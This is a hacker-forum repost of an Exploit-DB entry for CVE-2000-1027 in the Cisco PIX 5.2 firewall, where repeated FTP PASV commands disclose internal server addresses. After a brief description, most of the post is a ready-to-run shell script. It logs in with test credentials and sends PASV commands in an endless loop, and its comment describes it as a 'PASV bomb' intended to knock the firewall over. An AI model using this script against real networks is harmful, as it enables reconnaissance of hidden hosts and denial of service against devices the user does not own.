Exploit Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20369
Проверка EDB
  1. Пройдено
Автор
FABIO PIETROSANTI
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
cve-2000-1027
Дата публикации
2000-10-03
Код:
source: https://www.securityfocus.com/bid/1877/info

The Cisco PIX is a popular firewall network device. 

It is possible to configure the PIX so that it hides the IP address of internal ftp servers from clients connecting to it. By sending a number of requests to enter passive ftp mode (PASV) during an ftp session, the IP address will eventually be disclosed. It is not known what exactly causes this condition.

This has been verified on versions 5.2(4) and 5.2(2) of the PIX firmware and probably affects other versions.


# sent by: Fabio Pietrosanti (naif) <[email protected]>
# try to dos pix using PASV bomb

echo "USER ftptest99"
sleep 2
echo PASS ftptest99
sleep 2
echo SYST
while true
       do

            echo PASV
            sleep 1
            echo PASV
            echo PASV
            sleep 1
            echo PASV
            echo PASV
            sleep 1
            echo PASV
           echo PASV
            sleep 1
done
 
Источник
www.exploit-db.com

Похожие темы